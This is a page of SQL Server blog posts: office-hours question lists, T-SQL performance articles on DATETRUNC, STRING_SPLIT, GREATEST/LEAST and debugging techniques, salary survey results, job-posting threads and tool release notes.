Blog

  1. Home
  2. Blog
  3. Page 4

[Video] Office Hours: Bad Hair Edition

Videos
8 Comments

I am waaaay overdue for a haircut, but instead of being a responsible adult, I stopped to take your questions from https://pollgab.com/room/brento.

  • 00:00 Start
  • 00:43 Mike: We have 3 Dell PowerEdge R630 servers with SQL Server installed. Everything functions for 3.5 years straight. How long is it expected to work?
  • 01:30 Shalom: What are the worst incidents that you have witnessed due to SQL errors being routed to a mail folder that nobody ever reviewed?
  • 02:40 TheBigMC: Hi Brent. I’m about to start a new job where I’ll be looking after 100 SQL Servers. I’ve been told that’s a guess. How can I reliably scan a network to find servers people don’t even know exist
  • 05:00 Steph: Hi Brent, what are your top most dangerous seemingly benign SSMS menu items for which you shouldn’t approach your mouse pointer when connected on a prod database (for instance I once misclicked on ‘Fragmentation’ in ‘index properties’ on a prod db…). Thanks.
  • 06:02 Tim: Hi Brent. With Windows Server 2022 you can set the allocation unit size of a disk up to 2M. Is 64k still the best practice for SQL Server?
  • 07:58 DGW in OKC: Do people actually use Identity columns any more? What are the pros and cons of this practice?
  • 08:26 IndexingForTheWin: Hi, the company I now work for has taken the decision since 3 years to completely stop index rebuilds and only do stats updates. Wouldn’t we benefit from rebuilds (perhaps yearly)?
  • 09:18 Hamish: What are the pros/cons of using TSQL PRINT for debugging sprocs vs using table variables for debugging sprocs?
  • 09:44 Max: A friend of mine ask, what is better – add a bit field and index it on VLTB (over 2 Tb in size) with 60+ fields and 13 indexes already OR create a new table to store PK values of rows which have value 1 for this new field? Thanks
  • 12:10 John Bevan: Q1. When you have SQL running on an AzureVM, is it acceptable to use the D drive (i.e. low latency but ephemeral) over an attached disk for the TempDB?

Office Hours: Bad Questions Edition

Videos
4 Comments

Normally, y’all post and upvote great questions at https://pollgab.com/room/brento, but in today’s episode, y’all upvoted some stinkers. Buckle up.

  • 00:00 Start
  • 00:47 SQLKB: Hi, according to sp_BlitzCache I usually have more than 260k plans in cache, created in the past 1 hour, is it a big number? Comparing number of plans from exec_query_stats vs exec_cached_plans the numbers are 260k vs 130k , what could cause the diff between those numbers?
  • 02:23 Chase C: What do the options under linked server provider settings mean? “Allow inprocess” is frustratingly un-googleable and my technical manuals for SQL Server are also rather short on content. Cheers!
  • 04:09 sELECT RAM: You mentioned that PLE is useless recently. Why? and what is the alternative?
  • 05:21 Call Me Ishmael: Will SQL Server ever mandate the semi-colon as a statement terminator?
  • 07:35 Mike: What do you think about running SQL Server in Kubernetes for Production workloads in year 2023?
  • 09:07 Yitzhak: You once used a nice analogy in relating pilots to air planes and DBA’s to SQL Servers. Will you please share that again?
  • 10:47 Haddaway: When moving large tables to a new file group, does it ever make sense to do the migration with bcp command line vs using TSQL to copy the data to new location via insert?

3 Ways to Debug T-SQL Code

T-SQL
37 Comments

Writing new code = bugging. That part’s easy.

Taking those bugs back out, that’s the hard part.

Developers are used to their tools having built-in ways to show what line of code is running now, output the current content of variables, echo back progress messages, etc. For a while, SQL Server Management Studio also had a debugger, but it was taken out of SSMS v18 and newer versions. Even when it was around, though, I wasn’t a big fan: SQL Server would literally stop processing while it stepped through your query. This was disastrous if your query was holding out locks that stopped other peoples’ queries from moving forward – and you just know people were using it in production.

I do wish we had an easy, block-free way of doing T-SQL debugging in production, but T-SQL debugging is different than debugging C# code. So if your T-SQL code isn’t doing what you expect, here are a few better ways to debug it.

Option 1: Use PRINT statements.

Since the dawn of time, developers have put in lines like this:

So that when the statement fails, they can at least see which part failed:

There are a few problems with this approach:

  • PRINT doesn’t output data immediately. SQL Server caches the data that needs to be pushed out to the Messages. If you’re troubleshooting a long-running process, you probably want to see the messages show up immediately, as soon as they’re executed.
  • PRINT pushes data out over the network whether you want it or not, adding to the overhead of your commands. This isn’t a big deal for most shops, but when you start to exceed 1,000 queries per second, you’ll want to shave overhead where you can. You only really want the debugging messages coming out when you need ’em.

Let’s raise our game with RAISERROR.

Option 2: Use RAISERROR, pronounced raise-roar.

What? You didn’t notice that it’s misspelled? Okay, confession time, I didn’t realize that either – Greg Low of SQLDownUnder pointed it out to me. Let’s add a little more complexity to our code:

I’ve added a @Debug parameter, and my status messages only print out when @Debug = 1. Now, in this example, I don’t really need a parameter – but in your real-world stored procedures and functions, you’re going to want one, and you’ll want the default value set to 0, like this:

That way, you only turn on the debug features manually when you need ’em, but the app doesn’t call @Debug, so it just gets left at its default value, 0.

I’ve also switched to RAISERROR instead of PRINT because RAISERROR has a handy “WITH NOWAIT” parameter that tells SQL Server to push out the status message to the client right freakin’ now rather than waiting for a buffer to fill up.

When you’re troubleshooting long or complex processes, you’re probably going to want to dynamically drive the status message. For example, say it’s a stored procedure that takes hours to run, and you wanna see which parts of it took the longest time to run. You’re not gonna sit there with a stopwatch, and you’re not gonna come back later hoping that the queries will still be in the plan cache. Instead, you wanna add the date/time to the RAISERROR message.

Unfortunately, RAISERROR doesn’t support string concatenation. Instead, you have to pass in a single string that has everything you want, like this:

Which gives you the date at the end of the output:

You can even pass multiple arguments in – check out the RAISERROR syntax for more details on how the arguments work.

Option 3: Use Table Variables.

You’ve probably heard advice from me or others warning you that table variables lead to bad performance. That’s true in most cases – although sometimes they’re actually faster, as we discuss in the Fundamentals of TempDB class. However, table variables have a really cool behavior: they ignore transactions.

So even though I did a rollback, not a commit, I still get the contents of the table variable:

This is useful when you’re:

  • Troubleshooting a long-running process
  • The process has try/catch, begin/commit type logic where something might fail or roll back
  • Desiring the results in tabular format, possibly even with multiple columns, XML, JSON, whatever

And there you have it – 3 ways to work through debugging without using the discontinued SSMS Debugger. I typically use RAISERROR myself – it’s easy enough to implement, and it’s a technique you’ll use forever. There are more ways, too, and you’re welcome to share your favorite way in the comments.


How to Find Missing Rows in a Table

T-SQL
21 Comments

When someone says, “Find all the rows that have been deleted,” it’s a lot easier when the table has an Id/Identity column. Let’s take the Stack Overflow Users table:

It has Ids -1, 1, 2, 3, 4, 5 … but no 6 or 7. (Or 0.) If someone asks you to find all the Ids that got deleted or skipped, how do we do it?

Using GENERATE_SERIES with SQL Server 2022 & Newer

The new GENERATE_SERIES does what it says on the tin: generates a series of numbers. We can join from that series, to the Users table, and find all the series values that don’t have a matching row in Users:

The LEFT OUTER JOIN seems a little counter-intuitive the first time you use it, but works like a champ:

What’s that, you ask? Why does GENERATE_SERIES have fuzzy underlines? Well, SQL Server Management Studio hasn’t been updated with the T-SQL syntax that came out in the last release.

Thankfully, Microsoft separated the setup apps for SSMS and the SQL Server engine itself for this exact reason – the slow release times of SSMS were holding back the engine team from shipping more quickly, so they put the less-frequently-updated SSMS out in its own installer.

(Did I get that right? Forgive me, I’m not a smart man.)

Using Numbers Tables with Older Versions

If you’re not on SQL Server 2022 yet, you can create your own numbers table with any of these examples. Just make sure your numbers table has at least as many rows as the number of Ids you’re looking for. Here’s an example with a 100,000,000 row table:

Then, we’ll use that in a way similar to GENERATE_SERIES:

That produces similar results, but not identical:

What’s different? Well, this method didn’t include 0! When I populated my numbers table, I only built a list of positive integers. The single most common mistake I see when using numbers tables is not having thorough coverage of all the numbers you need. Make sure it goes as low and as high as the values you need – a problem we don’t have with GENERATE_SERIES, since we just specify the start & end values and SQL Server takes care of the rest.

If you’d like to dive deeper into other ways to solve this problem, Itzik Ben-Gan’s chapter on Gaps & Islands will be right up your alley. Me, though, I’ll call it quits here because I’m in love with GENERATE_SERIES to solve this problem quickly and easily. Also, I’m lazy.


The SQL Server Posts You Read the Most in 2022

Company News
3 Comments

Here’s what I wrote in 2022 that gathered the most views:

Evergreen Posts You Kept Reading

These aren’t posts I wrote in 2022 – they’re older posts that have stood the test of time, and keep showing up in Google results. These tutorial posts aren’t often the favorites of readers when the post first goes live, but they’re the kinds of posts that bring in new readers over time. I’ve gradually updated a lot of these (even if I wasn’t the original author) because they’re consistently popular.

Not only is it hard to write posts like this initially, but it takes work to continue to refine the content over time, adding in the kinds of key words and content that people are searching for. I actively prune some of ’em, and some of them were perfect when they were published.

Top YouTube Videos You Watched

My YouTube channel got 560,871 views in 2022, with 101,500 watch hours and 39,000 subscribers. I have to confess that I do a terrible job of reminding viewers to smash that like button and hit the bell to be notified when new posts go live. I’m just not that kind of host – yet, hahaha.

Here’s to a productive 2023 where I share a lot and y’all learn a lot!


Announcing the 2023 Data Professional Salary Survey Results.

Salary
12 Comments

Are your peers being paid more this year? Are they switching job roles? Are they planning on leaving their companies? To find out, I run a salary survey every year for folks in the database industry. Download the raw data here and slice & dice ’em to see what’s important to you.

Salaries are on the rise again this year:

If I filter the data for just the United States, they’re on the rise too:

And if I filter the data for just DBAs, the job title I’m usually most interested in, United States DBAs are on the rise by about 6% this year:

Nice! Congrats on the raises, y’all. (On the other hand, if you’re reading this, and you didn’t get a raise, now’s the time to download this data and start having a discussion with your manager.) You might also be considering switching jobs – so which job titles are getting the most this year?

Architects, app code developers, and managers are doing well. Note, though, that I’m filtering on just United States folks here, so the survey sample size is getting smaller. Plus, I would never make long term career decisions based on money alone – you might not be happy doing a particular job. (I hated management.)

Is any one job title growing at the expense of others? Are people leaving DBA work en masse and switching to something else? No, the mix by job title has been roughly the same over the years, despite what you might have heard from Thought Leaders™:

So why do you hear Thought Leaders™ saying one job role or another is dead, and another one is on fire? Because it’s a short-term publicity trend, sometimes as short as months, where a few publication outlets run the same stories and build buzz around something in order to get clicks.

Is there a mass resignation coming? What are peoples’ career plans for 2023, and have those numbers changed from prior years?

Most of you still want to stay with the same employer, in the same role. Well, in that case, here’s to a stable, safe 2023 for y’all.


Who’s Hiring in the Microsoft Data Platform Community? January 2023 Edition

Who's Hiring
11 Comments

Was your New Year’s resolution to get a new job? Heads up: the comments in this post are for you.

Is your company hiring for a database position as of January 2023? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • An email address to send resumes, or a link to the application process – if I were you, I’d put an email address because you may want to know that applicants are readers here, because they might be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


[Video] Office Hours: Holiday Speed Round

Videos
0

Beep beep! Here’s a speed round of Office Hours where I rip through a dozen questions in under ten minutes. Want to see your own questions answered? Post ’em and upvote the ones you like at https://pollgab.com/room/brento.

  • 00:00 Start
  • 00:22 DB-A-Team: Love and appreciate your work and please don’t make fun of my question. I want to create a special DB related project in my workplace next year, that can give an extra value like automate code deployment using CI/CD, any more ideas you have as someone who sees a lot of clients?
  • 01:03 TooSarcastic: Any tips or advice to keep a poker face when hearing non-sense from clients or coworkers?
  • 01:31 Haydar: When performing the ‘A’ of D.E.A.T.H., how do you avoid adding beneficial index for costly query that is infrequently executed? 02:04 Crypto Bro: Do you see any good / common use cases for new SQL 2022 Ledger functionality?
  • 02:27 Rick James: What is your opinion of AlloyDB for PostgreSQL from Google? Is this the Aurora killer?
  • 03:03 Herb: What is your opinion of new sp_invoke_external_rest_endpoint functionality in Azure SQL DB?
  • 03:47 Clarence Oveur: Are SQL CLR Udf’s any better / more desirable than scalar Udf’s?
  • 04:18 neil: I just noticed developers have been setting Read Committed Snapshot to ON on their databases without telling anyone. Should I be concerned?
  • 04:38 Dru: Is coding first responder kit for multiple versions of SQL painful like coding JavaScript for multiple browser versions?
  • 05:12 NeverEndingView: If you are tuning a view that you cannot get to complete or show an actual execution plan, will adding a TOP give you the same plan as running without? I let the query run for 19 hours and never received a plan.
  • 05:46 Bob the Builder: What is the largest SQL Server single DB size you have ever seen? What challenges does that large size present?
  • 06:14 Curious DBA: Hi Brent. I know you no longer get involved with DR scenarios, but was wondering if you ever encountered a scenario where a Suspect database couldn’t be brought into Emergency Mode? A friend encountered this scenario recently but was able to recover from backups. Thanks.
  • 06:38 RSS_Fees: Alberto Morillo mentioned on StackOverflow a tool called Data Sync Agent for SQL Data Sync. I never heard about it before but apparently you can use it to migrate or sync data from on-prem to Azure SQL Database. Have you ever used it?

SQL ConstantCare® Population Report: Winter 2022

Ever wonder how fast people are adopting new versions of SQL Server, or what’s “normal” out there for SQL Server adoption rates, hardware sizes, or numbers of databases? Let’s find out in the winter 2022 version of our SQL ConstantCare® population report.

Out of 3,679 monitored servers, here’s the version adoption rate:

The big ones:

  • SQL Server 2019: 32% – taking the lead from SQL Server 2016 for the first time!
  • SQL Server 2017: 20%
  • SQL Server 2016: 27%
  • That combo is 79% of the population right there (83% with Azure), and it supports a ton of modern T-SQL, columnstore, etc features, so it’s a fun time to be building apps with T-SQL

Companies are leapfrogging right past SQL Server 2017. I’m going to hazard a guess that SQL Server 2017 came out too quickly after 2016, and didn’t offer enough features to justify upgrades from 2016.

Does that offer us any lessons for SQL Server 2022? Is 2022 going to be a 2017-style release that people just leapfrog over? Well, as I write this, it’s late December 2022, and I’m not seeing the widespread early adoption that I saw for 2019 where people had it in development environments ahead of the release, learning how to use it.

Me personally, one of the most awesome features of 2022 is the ability to fail back and forth between SQL Server and Azure SQL DB Managed Instances. However, that feature is still in limited public preview that requires a signup. Combine that with the fact that both 2022 and Managed Instances have really low adoption rates, and … I just don’t think this feature is going to catch on quickly. (As a blogger/speaker/trainer, that’s useful information, too – I only have so many hours in the day, and I gotta write material for things I think people are actually going to adopt.)

Okay, next up – adoption trends over time. You’re going to be tempted to read something into this chart, but I need to explain something first: we saw a huge drop in Azure SQL DB users for SQL ConstantCare. In the past survey, we had exactly 500 Azure SQL DBs being monitored – and this round, it dropped to just 64. I talked briefly with a couple of the SaaS customers who stopped monitoring their databases, and they both said the same thing: “We’re not going to change the app’s code or indexes based on what you found, so we’re not going to monitor it further.” That’s fair – throwing cloud at it is a perfectly legit strategy. So now, having said that, let’s see the trends:

This quarter’s numbers are a little misleading because it looks like SQL Server 2019 stole Azure’s market share – but now you know why. If I look at pure installation numbers (not as a percentage):

  • We finally have a customer using SQL Server on Linux in production! It’s only one, but … still, I’m excited about that because I can dig into their diagnostic data and figure out which recommendations aren’t relevant for them.
  • Azure SQL DB Managed Instances stayed steady (but it’s still a tiny number relative to the overall population)
  • SQL Server 2019 definitely grew, and every other version went down
  • There are only 6 instances of SQL Server 2022 (and several of those are Development Edition)

The low early adoption rate of 2022 is more interesting to me when I combine it with another number: Availability Groups adoption is 26%, kinda. Of the production SQL Servers that can (2012 & newer, non-Azure, etc), 26% have turned on the Always On Availability Groups feature. Note that I didn’t say 26% of databases are protected, nor 26% of data volume – just 26% of the servers have the feature turned on, period, and that says something because the feature isn’t on by default, and requires a service restart to take effect.  Actual databases protected is way, way less.

One of SQL Server 2022’s flagship features is Managed Instance link, the ability to fail over databases back & forth between your SQL Server 2022 instances and Azure SQL DB Managed Instance. In theory, that’s awesome. In practice, I’ve never seen a concise live demo setting it up, failing it over, and failing it back. The setup part 1 and part 2 doesn’t look terrible, and the failover looks fairly straightforward, but … there are no docs on troubleshooting it. Between the low adoption rates, the complexity of existing AGs, the complexity of cloud networking, and this brand new feature, I’m … not ready to dig into Managed Instance link anytime soon.

I totally appreciate those of y’all who have the guts to try it, though, especially in production. I think that kind of thing is the future of hybrid databases. Looking at the current population numbers, though, it’s a pretty far-off future.


[Video] Office Hours: Ham Pillow Edition

Videos
2 Comments

Y’all post questions at https://pollgab.com/room/brento and upvote the ones you’d like to see me discuss, and then I artfully dodge giving you answers. At least, that’s how it feels sometimes, hahaha:

Here’s what we discussed in today’s episode:

  • 00:00 Start
  • 00:20 Piotr: Do many of your clients disable SA account for security? What are your thoughts on this practice?
  • 01:32 I was never given a name: What are your thoughts on using AI to generate SQL queries? OK for ad-hoc reporting, not for production? Specifically Ask Edith which is geared towards transforming English to SQL and ChatGPT.
  • 02:55 chandwich: Hey Brent! What’s your “go to” note taking app? I know you use Markdown, but is that all you use to improve note taking?
  • 03:24 Ólafur: What are some good ways to identify all NC indexes that could exceed the max key length of 1700 bytes in SQL 2019?
  • 04:06 Namor: Should SQL affinity mask be used/configured when SSRS / SQL Server are running on the same server so that each process gets it’s own processor?
  • 05:01 Sune Berg Hansen : Hey Brent, What features are no longer worth investing time in learning from a Admin or developer perspective? I have a coworker who still uses Server Side Tracing.
  • 05:57 Gustav: If you had to give a razzie award for worst performing cloud storage for VM SQL, which cloud vendor would win the award?
  • 06:57 Stockburn: Hi Brent, I assume you have needed to use a plan guide at some point in your career but at what point in a performance investigation do you decide this is the way to solve the problem? As always thank you for all you do for us SQL folk!
  • 08:58 Sune Berg Hansen : Yo Brent, What are your top 3 favorite movies?
  • 09:15 Lazze-SeniorAppDeveloper-JuniorDBA: Hi, We have a server with high cpu load ( 8 cores ) and high wait stats for parallelism(sql Enterprise 2019) + CPU Yield. MaxDOP 8, CTFP 50 – I’m thinking about decreasing MaxDop to 4 or maybe even 2, to leave more cores free to run other queries and help the wait stats?
  • 10:30 Yitzhak: How do you determine the optimal autogrowth size for a given data file? One server is on expensive SAN storage while the other is on cheaper cloud storage.

Should You Use SQL Server 2022’s GREATEST and LEAST?

SQL Server
2 Comments

If you’ve been following along with this week’s posts on DATETRUNC and STRING_SPLIT, you’re probably going to think the answer is no, but bear with me. It’s Christmas week, right? The news can’t all be bad.

GREATEST and LEAST are kinda like MAX and MIN, but instead of taking multiple rows as input, they take multiple columns. For example:

Produces 3 and 1. This actually has really useful real-world implications.

Let’s take the Stack Overflow database, and let’s say I want to find any posts (questions or answers) that had recent activity. This is surprisingly difficult because Posts has 2 date columns: LastEditDate, and LastActivityDate. You would think that LastActivityDate would be the most recent, but you would be incorrect – when posts are edited, the LastEditDate is set, but LastActivityDate is not.

So if I was looking for any Posts that were active – either via reader activity, or edits – in a date range, I used to have to build supporting indexes, and then write queries like this:

I’m using 2018-05-27 because my copy of the Stack Overflow database’s last activity is in 2018-06-03. Depending on which version you’re using, if you’re trying to reproduce these results, pick a date that’s within the last week of activity

So, what’s better – the old way or the new way? Like your hips, the actual execution plans don’t lie:

The old way smokes the SQL Server 2022 way. I mean, it’s not even close. The old way splits up the work into two index seeks, one on LastActivityDate and one on LastEditDate. It finds the recent stuff, does the appropriate key lookups, and it’s done in one second.

The new way does a table scan and takes a minute and a half.

Its estimates and its index usage are just garbage, and I don’t mean like Shirley Manson.

Again – they’re not necessarily bad functions, but they have no business in the FROM clause and below. Don’t use them in WHERE, don’t use them in JOINS, just use them to construct output, variables, and strings.


Should You Use SQL Server 2022’s STRING_SPLIT?

T-SQL
2 Comments

SQL Server 2022 improved the STRING_SPLIT function so that it can now return lists that are guaranteed to be in order. However, that’s the only thing they improved – there’s still a critical performance problem with it.

Let’s take the Stack Overflow database, Users table, put in an index on Location, and then test a couple of queries that use STRING_SPLIT to parse a parameter that’s an incoming list of locations:

The two queries produce slightly different actual execution plans, but the way STRING_SPLIT behaves is the same in both, so I’m just going to take the first query to use as an illustration:

That red-highlighted part has two problems:

  1. SQL Server has no idea how many rows are going to come out of the string, so it hard-codes a guesstimate of 50 items
  2. SQL Server has no idea what the contents of those rows will be, either – it doesn’t know if the locations are India, China, or Hafnarfjörður

As a result, everything else in the query plan is doomed. The estimates are all garbage. SQL Server will choose the wrong indexes, process the wrong tables first, make the wrong parallelism decisions, be completely wrong about memory grants, you name it.

Like I wrote in this week’s post about DATETRUNC, that doesn’t make STRING_SPLIT a bad tool. It’s a perfectly fine tool if you need to parse a string into a list of values – but don’t use it in a WHERE clause, so to speak. Don’t rely on it to perform well as part of a larger query that involves joins to other tables.

Working around STRING_SPLIT’s problems

One potential fix is to dump the contents of the string into a temp table first:

And the actual execution plan is way better than the prior examples. You can see the full plan by clicking that link, but I’m just going to focus on the relevant STRING_SPLIT section and the index seek:

This plan is better because:

  • SQL Server knows how many rows are in #LocationList
  • Even better, it knows what those rows are, and that influences its estimate on the number of users who live in those locations, which means
  • SQL Server makes better parallelism and memory grant decisions through the rest of the plan

Woohoo! Just remember that temp tables are like OPTION (RANDOM RECOMPILE), like I teach you in this Fundamentals of TempDB lecture.


Should You Use SQL Server 2022’s DATETRUNC?

T-SQL
10 Comments

SQL Server 2022 introduced a new T-SQL element, DATETRUNC, that truncates parts of dates. For example:

Truncates everything in that date other than the year, so it returns just 2017-01-01 00:00:

You might ask, “Well, why not just use YEAR()?” That’s a good question – there are times when you need a start or end date for a date range, and this could make it easier than trying to construct a full start & end date yourself.

Easier for you, that is – but not necessarily good for performance. Let’s take the Stack Overflow database, Users table, put in an index on LastAccessDate, and then test a few queries that are logically similar – but perform quite differently.

And check out their actual execution plans:

The first one, passing in a specific start & end date, gets the best plan, runs the most quickly, and does the least logical reads (4,299.) It’s a winner by every possible measure except ease of writing the query. When SQL Server is handed a specific start date, it can seek to that specific part of the index, and read only the rows that matched.

DATETRUNC and YEAR both produce much less efficient plans. They scan the entire index (19,918 pages), reading every single row in the table, and run the function against every row, burning more CPU.

SQL Server’s thought process is, and has always been, “I have no idea what’s the first date that would produce YEAR(2017). There’s just no way I could possibly guess that. I might as well read every date since the dawn of time.”

That’s idiotic, and it’s one of the reasons we tell ya to avoid using functions in the WHERE clause. SQL Server 2022’s DATETRUNC is no different.

So why doesn’t Microsoft fix this?

YEAR and DATETRUNC are tools, just like any other tool in the carpenter’s workshop. There are lots of times you might need to manipulate dates:

  • When constructing a dynamic SQL string, and you want to build a date – sure, using a function to build the WHERE clause string is fine. Just don’t use the function in the WHERE clause itself.
  • When constructing the contents of variables
  • When constructing the output of the query – sure, using a function like this in the SELECT is fine, because it doesn’t influence the usage of indexes in the query plan

DATETRUNC in the SELECT isn’t so bad.

Let’s use it in the SELECT clause to group users together by their last access date. Say we want a report to show trends over time. Here are two ways to write the same basic idea of a query:

The two queries do show the date in two different ways, but the UsersInvolved count is the same – it’s just different ways of rendering the same data:

When you review their actual execution plans, the first one (YEAR/MONTH) is much more complex, and goes parallel to chew through about 4 seconds of CPU time:

Whereas the new DATETRUNC syntax has a cool benefit: it only produces one value (the date), and the data in the index is already sorted by that column. Because of that, we don’t need an expensive sort in the execution plan. And because of that, we don’t need parallelism, either, and we only chew through about two seconds of CPU time. Nifty!

So should you use DATETRUNC? Like with most functions, the answer is yes in the select, but probably not in the FROM/JOIN/WHERE clauses.


[Video] Office Hours: Great Questions, Part 2

Videos
2 Comments

Every time I think, “There can’t be any more SQL Server questions left,” y’all post more great ones at https://pollgab.com/room/brento!

Here’s what we covered:

  • 00:21 MattC: Hi Brent. Have you check out ChatGPT’s ability to write SQL code. VERY impressive and in some cases faster than a stackoverflow question. In fact stackoverflow have had to ban people using GPT to answer peoples questions
  • 02:28 Haddaway: Does high VLF count matter when it is in TempDB? sp_blitz reports 1000 VLF’s for TempDB.
  • 04:33 Yousef: Is GUID data type a good clustered index when concurrent inserts are high?
  • 05:51 Prohiller: Hi Brent, is there any reason why not enable automatic page repairs in my AGs? Any gotchas MS documentation isn’t mentioning?
  • 06:21 DavDBA: Hey Brent, I want to do some maintenance work on my server and was wondering Does one of the blitz scripts finds invalid objects at a Server/DB level?
  • 06:56 Wendigo: When modifying columns in SSMS table designer, why does “Generate change script” like to copy all the existing data to a new temp table, then swap the tables as opposed to just altering the column directly?
  • 07:54 The Purge Police: Any tips for identifying all tables that are growing unbounded without retention policies?
  • 08:50 Hrafnhildur: What SQL Prompt features would you like to see included in future versions of SSMS / Azure Data Studio?
  • 10:42 Dr. Ruth: What are some recommended techniques for identifying sprocs that are no longer used? Have hundreds of sprocs but not all still used and would like to clean up.
  • 12:07 Fyodor: Is it ever OK to use the leading columns of the clustered index as the leading columns for some of the non-clustered indexes? Any gotcha’s with this?
  • 13:03 Culloden: I keep seeing MS invest in Storage Spaces Direct. Why would one decide to put SQL Server on commodity hardware? I’ve only worked at organizations with large prod servers that use SANs for storage.
  • 14:31 coffee_table: Hello! what are the gotchas with doing hourly incremental loads to a data warehouse rather than a single overnight load? Would statistics always be misleading? Doug Lane Videos on your channel suggest that a filtered stats might be a solution. Thoughts?

Updated First Responder Kit and Consultant Toolkit for December 2022

Santa’s elves took a break from building toys and shipped a new version of the First Responder Kit. There are some great improvements in here, like a makeover for sp_BlitzLock and much better PSPO compatibility for sp_BlitzCache.

How I Use the First Responder Kit
Wanna watch me use it? Take the class.

To get the new version:

Consultant Toolkit Changes

I updated it to this month’s First Responder Kit, but no changes to querymanifest.json or the spreadsheet. If you’ve customized those, no changes are necessary this month: just copy your spreadsheet and querymanifest.json into the new release’s folder.

sp_AllNightLog Changes

  • Fix: if a database exists and it’s not being log shipped, skip it rather than overwrite it. (#3187, thanks David Wiseman.)

sp_Blitz Changes

sp_BlitzCache Changes

  • Enhancement: show a statement’s parent stored procedure where available in SQL Server 2022 to work around the PSPO problem. (#3176, thanks Cody Konior.)
  • Fix: if you asked for the output of @SortOrder = ‘unused grant’ to be written to table, it wasn’t working. (#3160, thanks Petr-Starichenko.)

sp_BlitzFirst Changes

  • Fix: Managed Instances were getting errors on Perfmon counters. (#3184, thanks Cody Konior.)
  • Fix: lock timeout errors from sp_msforeachdb. (#3180, thanks Cody Konior.)

sp_BlitzIndex Changes

  • Enhancement: added support for output to table for all modes. (#2774, thanks Tor-Erik Hagen.)
  • Fix: the columnstore index visualization wasn’t filtering out tombstone rowgroups. (#3189)
  • Fix: statistics with oddball names would throw errors. (#3162, thanks Jay Holliday.)

sp_BlitzLock Changes

  • Enhancement: in Erik’s words, he gave the T-SQL a mommy makeover, including the ability to read from the ring buffer, improve performance, fix data duplicatoin bugs, clean XML to avoid character parsing errors, etc. (#3166, thanks Erik Darling.)

sp_BlitzQueryStore Changes

sp_BlitzWho Changes

  • Enhancement: move session_id and blocking_session_id next to each other for easier blocking troubleshooting. (#3159, thanks David Hooey.)

sp_DatabaseRestore Changes

Bonus changes: Anthony Green kept up the tireless work of keeping the SQL Server versions file up to date.

For Support

When you have questions about how the tools work, talk with the community in the #FirstResponderKit Slack channel. Be patient: it’s staffed by volunteers with day jobs. If it’s your first time in the community Slack, get started here.

When you find a bug or want something changed, read the contributing.md file.

When you have a question about what the scripts found, first make sure you read the “More Details” URL for any warning you find. We put a lot of work into documentation, and we wouldn’t want someone to yell at you to go read the fine manual. After that, when you’ve still got questions about how something works in SQL Server, post a question at DBA.StackExchange.com and the community (that includes me!) will help. Include exact errors and any applicable screenshots, your SQL Server version number (including the build #), and the version of the tool you’re working with.


[Video] Office Hours: Great Questions, Part 1

Videos
0

Wow, y’all have been posting some great questions at https://pollgab.com/room/brento lately!

Here’s what we covered today:

  • 00:59 Gustav: Hi Brent We recently migrated to SQL MI General Purpose, and I noticed that the default blob storage per .mdf /.ndf file is 128Gb container with 500 IOPS! This is terribly slow! Would splitting the database into multiple files, increase read / write performance?
  • 02:39 PAAREES: Is it normal getting corruption like errors if you stop a running dbcc checkdb and getting no errors if you let it finish in the same db/vm ?
  • 03:07 MancDBA: Hi Brent, Over the years, have you ever felt blogging and giving back so much to the community (for free) has ever been a thankless task especially if people are mean to you? Cheers!
  • 04:40 Len: What criteria do you use for deciding which tables need more/less statistic updates, which tables need full scan vs sampled scan?
  • 07:30 Namor: How does the PostgreSQL DBA learning track compare with SQL Server (width, depth, difficulty)?

Who’s Hiring in the Microsoft Data Platform Community? December 2022 Edition

Who's Hiring
11 Comments

Is your company hiring for a database position as of December 2022? Do you wanna work with the kinds of people who read this blog? Let’s set up some rapid networking here. If your company is hiring, leave a comment.

The rules:

  • Your comment must include the job title, and either a link to the full job description, or the text of it. It doesn’t have to be a SQL Server DBA job, but it does have to be related to databases. (We get a pretty broad readership here – it can be any database.)
  • An email address to send resumes, or a link to the application process – if I were you, I’d put an email address because you may want to know that applicants are readers here, because they might be more qualified than the applicants you regularly get.
  • Please state the location and include REMOTE and/or VISA when that sort of candidate is welcome. When remote work is not an option, include ONSITE.
  • Please only post if you personally are part of the hiring company—no recruiting firms or job boards. Only one post per company. If it isn’t a household name, please explain what your company does.
  • Commenters: please don’t reply to job posts to complain about something. It’s off topic here.
  • Readers: please only email if you are personally interested in the job.

If your comment isn’t relevant or smells fishy, I’ll delete it. If you have questions about why your comment got deleted, or how to maximize the effectiveness of your comment, contact me.

Each month, I publish a new post in the Who’s Hiring category here so y’all can get the latest opportunities.


Slow “Having” Query? Try Pre-Filtering.

T-SQL
11 Comments

I was helping a client with a query, and I’m going to rework the example to use the Stack Overflow database for easier storytelling.

Say we need to:

  1. Find all the locations where users have logged in since a certain date, then
  2. Return the total count of people who live in those locations

One way to write the query would be:

And in order to expedited it, I’ve added a couple of indexes:

When the query runs, its actual execution plan is a scan of all the locations:

Because to SQL Server, it has to group the locations together, finding the max LastAccessDate in every location, before it begins the filtering process.

The client said, “Wait, that doesn’t make any sense – why isn’t SQL Server using the index on LastAccessDate? It has the Location on there too. SQL Server could just jump to 2022-01-01 on that index, make a list of the Locations that match, and then use those for the next part of the query.”

Well, it could. But the query optimizer wasn’t written that way.

Instead, if you want that behavior, you have to rewrite the query yourself:

The query runs nearly instantaneously because its actual execution plan is much more efficient in cases where few locations match:

It only does 3 logical reads instead of about 30,000.

A few things to keep in mind:

  • I used a CTE, but other ways can work as well, like subqueries or temp tables.
  • This technique only works well when a minority of rows match the filter.
  • If the filter is parameterized, and its value changes dramatically, this is a recipe for parameter sniffing.
  • Temp tables can be a solution to that, but you have to watch out for temp table stats reuse.

[Video] Office Hours: Speed Round Edition

Videos
0

